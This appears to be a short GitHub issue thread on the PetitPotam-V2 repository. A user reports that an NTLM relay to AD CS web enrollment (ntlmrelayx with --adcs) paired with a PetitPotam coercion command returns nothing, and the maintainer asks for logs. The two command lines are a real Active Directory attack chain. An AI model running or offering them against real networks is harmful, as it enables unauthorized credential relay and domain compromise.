XiaoliChan / PetitPotam-V2

More EFS coerced authentication method with PetitPotam.py
20 stars 1 forks source link

adcs #2

Open sec13b opened 4 months ago

sec13b commented 4 months ago

I try this 2 commands .but nothing receive .

impacket-ntlmrelayx -smb2support -t http://KALI_IP/certsrv/certfnsh.asp --adcs --template 'DomainComputers'

python3 PetitPotam.py KALI_IP Server_IP

XiaoliChan commented 4 months ago

Any screenshots or logs?